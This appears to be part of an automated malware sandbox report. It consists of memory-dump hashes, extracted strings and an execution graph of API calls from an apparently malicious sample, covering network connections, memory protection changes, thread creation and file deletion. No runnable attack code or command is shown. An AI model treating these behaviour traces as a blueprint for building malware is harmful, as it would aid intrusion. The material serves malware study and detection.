                                                                                                                                                                                                                              • Opcode Fuzzy Hash: be98553be017181956b7d43f5dd6d2670eb2d2b5e097560b4e427d974450313c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2911FEB58002499FCB10DF9AC985BDEBBF8EB48320F20841AE558A7250C375A984CFA1
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: DispatchMessage
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2061451462-0
                                                                                                                                                                                                                              • Opcode ID: 4d8304087d87c956b6eee092ac120547e296bfd1f43a041f43ddaa0cd6da5328
                                                                                                                                                                                                                              • Instruction ID: fe09bd193cac4ff39d96159ed9e53f92cf08c0aaa9a127121ba6ad5e29cba2fe
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 4d8304087d87c956b6eee092ac120547e296bfd1f43a041f43ddaa0cd6da5328
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 52110DB5C00249CFCB10CF9AD944BCEFBF8EB48324F20842AD569A7250D378A644CFA5
                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 071D6CBD
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4140421385.00000000071D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071D0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_71d0000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: Initialize
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 2538663250-0
                                                                                                                                                                                                                              • Opcode ID: 99e2a9cb6c9d233ce01ed0fffd963db23826f27e137c93da4b44e15d7880cc75
                                                                                                                                                                                                                              • Instruction ID: 6cb499c79fd966fff78871168747477188b5e0aa66c5cb27f28d2bdae00a2fb9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 99e2a9cb6c9d233ce01ed0fffd963db23826f27e137c93da4b44e15d7880cc75
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 991100B58002588FCB10DF99D545BDEBBF4AB48320F20845AD558A7250D378A944CFA5
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124415721.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_aad000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d636b29d2879fc33592ea1b60fec16bbe640fead1efe4e208a033924d87c4ade
                                                                                                                                                                                                                              • Instruction ID: d8e522088c50ddfb242930e50f8025b100669d868f1b01bf54f9b8bda91355b5
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d636b29d2879fc33592ea1b60fec16bbe640fead1efe4e208a033924d87c4ade
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3B212571900241DFCB05DF14D9C0B2ABF65FB99318F24C569E88A0B696C336D856DBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124415721.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_aad000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 27c85d0b7acef521e52c5a72d7c233707cfd2ea36d4567e3cfba44f1f0fb492c
                                                                                                                                                                                                                              • Instruction ID: 9cfaf181551cdc490d726d3729c196c54aea8afa41fdc3412b04f2029b9e1e8b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 27c85d0b7acef521e52c5a72d7c233707cfd2ea36d4567e3cfba44f1f0fb492c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25214571100200DFDB00DF04C9C0B2ABF65FB98324F20C169E84A0F696C33AE846CAA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124537473.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_abd000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 9be2bbd4615fd0e167b31b448321abc600a6fdf328b244fca8a58b1a0ca6597c
                                                                                                                                                                                                                              • Instruction ID: d6babe302b04faa5d5be4611552060e00675179f65b90045850b6b9ac68ce9fd
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 9be2bbd4615fd0e167b31b448321abc600a6fdf328b244fca8a58b1a0ca6597c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4421F275604240DFCB14EF14D984B66BFA9FB88314F24C569D80A4B297D33AD847CA61
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124537473.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_abd000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 5f29078469c43e6aeae9c4d81d35486610450dd6ab57c3ee82e3a626d6423b08
                                                                                                                                                                                                                              • Instruction ID: db17a98e186e1b9f5dbb55445fddf8ba4627533faa734e1c2d04b3a8e6a0c305
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5f29078469c43e6aeae9c4d81d35486610450dd6ab57c3ee82e3a626d6423b08
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: BC212375504244DFDB00DF14DAC4BAABFA9FB84324F24C569D8494F243D33AD846CBA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124415721.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_aad000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                              • Instruction ID: 7b48663954356b1e0cdef693b44a74e357cee3ecd516c6a073cfb3b62292cf79
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3811D376904280CFCB16CF14D5C4B16BF71FB94318F24C6A9D84A0B656C336D85ACBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124415721.0000000000AAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00AAD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_aad000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                              • Instruction ID: 849a5a17a0d5e09c22b86fa8066a930c1ba3ca422678f53f615b502674c48e3c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 201b50b495cf87aa99c5283e85c62261d36f592a674eeeb3b47fc5aac64b1fd2
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 02110376404240CFDB02CF00D5C4B16BF71FB98324F24C2A9D84A0B656C33AE85ACBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124537473.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_abd000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                              • Instruction ID: 9535350f634d044ccb18baba876ed7ea0f8f35ce92b8efd90beb8735d04c109b
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9211DD75504280CFCB11DF14D5C4B56FFA2FB84318F28C6AAD80A4B656C33BD80ACBA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000008.00000002.4124537473.0000000000ABD000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ABD000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_8_2_abd000_UNK_.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                                                              • Instruction ID: 7d57c77c4fba306384ae83f455a9a35551dc6b8cf54808ae48dfc198a128d00c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 72d23902bf60047e6ac5528eaef86f122a9a091f4bdaa5726a35430d0a81cb07
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: D3119075504280CFDB11CF14D5C4B59BFA1FB84324F24C6AAD8494B657C33AD80ACBA2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1811244396.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 7e155372b3bef7f8e0a42c0227c341140b13148c41c925f62c035e1890deb736
                                                                                                                                                                                                                              • Instruction ID: 751dba661f8e09a28de49817ab8d2716c69c47b104cbc9d896d8aa5fd6c02cb4
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e155372b3bef7f8e0a42c0227c341140b13148c41c925f62c035e1890deb736
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 7C818D34A042489FCB05CF6AD4809AEFFF2EF89310F1584AAE454AB362D735ED45CB60
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1825577378.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7950000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 97a25a8525e552ae83753286283fded1a398edf234c3216374b90f0f86ee986c
                                                                                                                                                                                                                              • Instruction ID: 580a385b19671ebef6454ab45fb2538bf145f0c22cbe0ddd4372c65b4f6a1b99
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 97a25a8525e552ae83753286283fded1a398edf234c3216374b90f0f86ee986c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: F45139B1B402399FCB25DB68981176ABFA7AF8121CF1484A6DD049B356DB32CD41C7E2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1825577378.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7950000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 865307cc30dd0fa783b8de93ebb820cef0dccb1dee94fe6d0c19d9602963884b
                                                                                                                                                                                                                              • Instruction ID: 890b2e86e940bafb225a8d1a56b128d3b5aaed25504c0c80844028d909000500
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 865307cc30dd0fa783b8de93ebb820cef0dccb1dee94fe6d0c19d9602963884b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 24412BF1A4022ADFCB25CF249951BAA7BABAF8131CF1444A6DD049F256D731C940C7A2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1811244396.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 92a2323a15bc15d86470cb7806f718f68c31d1436df467516a422c9b063dd635
                                                                                                                                                                                                                              • Instruction ID: 461b6aaf5a5024091afa8447ad3c7f2dae0f564ea98277fe3ca72487cfe38845
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 92a2323a15bc15d86470cb7806f718f68c31d1436df467516a422c9b063dd635
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C31A074A093959FCB02DF6DC8909AABFB0FF4A200B098096D455DB363D634FC48CBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1811244396.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: 142d8c25f3400340183964f93e682ea3fcde66dddb14c455157ee579b407ce7c
                                                                                                                                                                                                                              • Instruction ID: c019bc3138d525bd9bf7d0e4d0874b9822dc3bd7046c1350337685cc9b12bd0e
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 142d8c25f3400340183964f93e682ea3fcde66dddb14c455157ee579b407ce7c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: B2210878A00219DFCB00DF9DD8809AABBB5FF89310B1585A9D819EB351D735FC41CBA1
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1809882488.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_319d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: d4acbd23bb10273e8a0422dd2c2dfcac2b9a4bc980986841c12873a56352b46c
                                                                                                                                                                                                                              • Instruction ID: 9a368de291902858f812aa36fddd055d6f94618d972dbba03abd338a091a56bb
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4acbd23bb10273e8a0422dd2c2dfcac2b9a4bc980986841c12873a56352b46c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6801F2314093009BFB10CA29ED84B67FF98EF49324F1DC56BED080B286C7799881C6B2
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1809882488.000000000319D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0319D000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_319d000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: a0dfc8ea72a3a5bb0f8f2b861473735fc5a8a5e852673ea19f55bc1dc59c86fc
                                                                                                                                                                                                                              • Instruction ID: b1c5762f465e37421324cbc2221d95d6151f59096b3272e8642449512f632202
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: a0dfc8ea72a3a5bb0f8f2b861473735fc5a8a5e852673ea19f55bc1dc59c86fc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 73012D7140E3C09FE7128B259894B52BFB4EF47224F1D85CBD9888F2A3C2699845C772
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1811244396.0000000004AE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04AE0000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_4ae0000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                                              • Opcode ID: f26939eac59a9eddb75dbe46f5fc9f0289f8007279776662c19590ec70e4604b
                                                                                                                                                                                                                              • Instruction ID: f1dcfc94050c7aee5304f2214e35c03e3ca8c5c4270d7ec0b5c7c69e234df177
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: f26939eac59a9eddb75dbe46f5fc9f0289f8007279776662c19590ec70e4604b
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AFF0D435A001099FCB15CF9DD990AEEF7B5FF88324F208199E525A72A1C736AC52CB61
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1825577378.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7950000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q$$^q$l$l
                                                                                                                                                                                                                              • API String ID: 0-2208146824
                                                                                                                                                                                                                              • Opcode ID: 43e3dc6eda28368803fbb6f0411e75779161830c75710fab01ad975524f6922c
                                                                                                                                                                                                                              • Instruction ID: e44f81569b23596a801b1d364a80380e63e0841b64f8c7275d5808005007c17f
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 43e3dc6eda28368803fbb6f0411e75779161830c75710fab01ad975524f6922c
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: E3517EB178422EDFCB25CA6994107A6BBBAAFC1218F14847BDC05CB251DA32C885C791
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1825577378.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7950000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: tP^q$tP^q$$^q$$^q$$^q$l$l
                                                                                                                                                                                                                              • API String ID: 0-2697109961
                                                                                                                                                                                                                              • Opcode ID: b983bb60f894234176966783ca17c715a03ad779bf131e95fef20c25b5640318
                                                                                                                                                                                                                              • Instruction ID: aa9b417fd5c89e13f8c2b29d462ee93d9bfb800e65ac2f0f5e701bb6f7315d62
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b983bb60f894234176966783ca17c715a03ad779bf131e95fef20c25b5640318
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 785138B27042658FC724CA7DD800A6ABBE9EFC1724F28846BD944CB361CA72DC45C7E0
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1825577378.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7950000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: $^q$$^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2125118731
                                                                                                                                                                                                                              • Opcode ID: 1d0cea5b408c79c0ec3407870bb5fb0b7448a49873d65c052c1201f593485588
                                                                                                                                                                                                                              • Instruction ID: 7aefca00c4c831d7f0a38a74a92a56e6cea6a8b9837ab37e9a5396c91127853d
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1d0cea5b408c79c0ec3407870bb5fb0b7448a49873d65c052c1201f593485588
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5C2149B17103269BDB38C96A9804B27ABDE9BC075DF64882AAC05CF385DD76C845C361
                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000009.00000002.1825577378.0000000007950000.00000040.00000800.00020000.00000000.sdmp, Offset: 07950000, based on PE: false
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_9_2_7950000_powershell.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: 4'^q$4'^q$$^q$$^q
                                                                                                                                                                                                                              • API String ID: 0-2049395529
                                                                                                                                                                                                                              • Opcode ID: b62de13574cc14b99c02d6e972e0f1ab8f8dc18cd321acc8ba297165ca04191e
                                                                                                                                                                                                                              • Instruction ID: 72321861198bcf38bbde056976ebf373714b244e856ad8b60a4afb8920ae82bc
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: b62de13574cc14b99c02d6e972e0f1ab8f8dc18cd321acc8ba297165ca04191e
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: AE01F72170A3E65FC72B563C19201566FB65FC361472945EBC080CF3ABCD258D4E83A3

                                                                                                                                                                                                                              Execution Graph

                                                                                                                                                                                                                              Execution Coverage:6.2%
                                                                                                                                                                                                                              Dynamic/Decrypted Code Coverage:11%
                                                                                                                                                                                                                              Signature Coverage:6.9%
                                                                                                                                                                                                                              Total number of Nodes:636
                                                                                                                                                                                                                              Total number of Limit Nodes:29
                                                                                                                                                                                                                              execution_graph 39122 1000c7a7 39123 1000c7be 39122->39123 39128 1000c82c 39122->39128 39123->39128 39134 1000c7e6 GetModuleHandleA 39123->39134 39125 1000c872 39126 1000c835 GetModuleHandleA 39127 1000c83f 39126->39127 39127->39127 39127->39128 39130 1000c85f GetProcAddress 39127->39130 39128->39125 39128->39126 39128->39127 39129 1000c7dd 39129->39127 39129->39128 39131 1000c800 GetProcAddress 39129->39131 39130->39128 39131->39128 39132 1000c80d VirtualProtect 39131->39132 39132->39128 39133 1000c81c VirtualProtect 39132->39133 39133->39128 39135 1000c82c 39134->39135 39136 1000c7ef 39134->39136 39139 1000c872 39135->39139 39140 1000c835 GetModuleHandleA 39135->39140 39141 1000c83f 39135->39141 39146 1000c803 GetProcAddress 39136->39146 39138 1000c7f4 39138->39135 39142 1000c800 GetProcAddress 39138->39142 39140->39141 39141->39135 39141->39141 39145 1000c85f GetProcAddress 39141->39145 39142->39135 39143 1000c80d VirtualProtect 39142->39143 39143->39135 39144 1000c81c VirtualProtect 39143->39144 39144->39135 39145->39135 39147 1000c82c 39146->39147 39148 1000c80d VirtualProtect 39146->39148 39150 1000c872 39147->39150 39151 1000c835 GetModuleHandleA 39147->39151 39148->39147 39149 1000c81c VirtualProtect 39148->39149 39149->39147 39153 1000c83f 39151->39153 39152 1000c85f GetProcAddress 39152->39153 39153->39147 39153->39152 39154 4156ea 39155 4156b4 39154->39155 39155->39154 39157 411aed 39155->39157 39166 4041f1 39157->39166 39159 411b01 39173 40428c connect 39159->39173 39161 411b09 39195 404468 39161->39195 39163 411b36 39203 4045d5 39163->39203 39165 411b4c 39165->39155 39167 404206 socket 39166->39167 39168 4041fd 39166->39168 39170 404220 39167->39170 39171 404224 CreateEventW 39167->39171 39212 404262 WSAStartup 39168->39212 39170->39159 39171->39159 39172 404202 39172->39167 39172->39170 39174 4043e1 39173->39174 39181 4042b3 39173->39181 39175 4043e7 WSAGetLastError 39174->39175 39192 404338 39174->39192 39177 4043f7 39175->39177 39175->39192 39176 4042e8 39180 404306 39176->39180 39182 4042f7 39176->39182 39178 4043fc 39177->39178 39177->39182 39217 41bc76 FormatMessageA LocalFree 39178->39217 39185 40434c 39180->39185 39188 404315 39180->39188 39181->39176 39181->39192 39213 41a686 39181->39213 39186 41a686 GetLocalTime 39182->39186 39184 40440b 39187 41a686 GetLocalTime 39184->39187 39190 404359 39185->39190 39193 404389 39185->39193 39186->39192 39187->39192 39189 41a686 GetLocalTime 39188->39189 39189->39192 39191 41a686 GetLocalTime 39190->39191 39191->39192 39192->39161 39193->39192 39194 41a686 GetLocalTime 39193->39194 39194->39192 39196 40447b 39195->39196 39197 404507 WaitForSingleObject 39196->39197 39198 4044e7 39196->39198 39200 40451d 39197->39200 39199 4044f9 send 39198->39199 39202 404542 39199->39202 39201 404530 SetEvent 39200->39201 39201->39202 39202->39163 39207 4045ec 39203->39207 39205 404666 39241 4047eb 39205->39241 39207->39205 39218 446aff 39207->39218 39225 40455b 39207->39225 39230 404688 39207->39230 39235 446ac5 39207->39235 39208 40466d 39208->39165 39212->39172 39214 41a69c GetLocalTime 39213->39214 39215 41a737 39213->39215 39216 41a6de 39214->39216 39215->39176 39216->39215 39217->39184 39219 446b3d 39218->39219 39224 446b0d _strftime 39218->39224 39250 445354 20 API calls _Atexit 39219->39250 39221 446b28 RtlAllocateHeap 39222 446b3b 39221->39222 39221->39224 39222->39207 39224->39219 39224->39221 39249 442200 7 API calls 2 library calls 39224->39249 39226 404592 recv 39225->39226 39227 404565 WaitForSingleObject 39225->39227 39228 4045a5 39226->39228 39229 404581 SetEvent 39227->39229 39228->39207 39229->39228 39233 4046a3 39230->39233 39231 4047d8 39231->39207 39232 404772 CreateEventA CreateThread WaitForSingleObject CloseHandle 39232->39233 39384 414b9b 39232->39384 39233->39231 39233->39232 39251 411b60 39233->39251 39236 446ad0 RtlFreeHeap 39235->39236 39240 446af9 __dosmaperr 39235->39240 39237 446ae5 39236->39237 39236->39240 39427 445354 20 API calls _Atexit 39237->39427 39239 446aeb GetLastError 39239->39240 39240->39207 39242 4047ff 39241->39242 39243 404805 SetEvent CloseHandle 39242->39243 39244 40481c closesocket 39242->39244 39248 40483f 39243->39248 39245 404829 39244->39245 39246 404838 39245->39246 39245->39248 39428 404ab1 CreateEventA SetEvent WaitForSingleObject CloseHandle GetLocalTime 39246->39428 39248->39208 39249->39224 39250->39222 39253 411b72 39251->39253 39252 411c60 39252->39233 39253->39252 39257 411c81 GetModuleFileNameW 39253->39257 39255 411c50 39256 4047eb 8 API calls 39255->39256 39256->39252 39260 411cac 39257->39260 39258 40c854 43 API calls 39258->39260 39259 41ab38 GetCurrentProcessId 39259->39260 39260->39258 39260->39259 39261 4176b6 23 API calls 39260->39261 39262 411f90 DeleteFileW 39260->39262 39263 41b61a CreateFileW GetFileSize ReadFile CloseHandle 39260->39263 39264 411fc7 DeleteFileW 39260->39264 39265 412019 Sleep 39260->39265 39266 412003 DeleteFileW 39260->39266 39267 412090 39260->39267 39261->39260 39262->39260 39263->39260 39264->39260 39265->39260 39266->39260 39275 4123f7 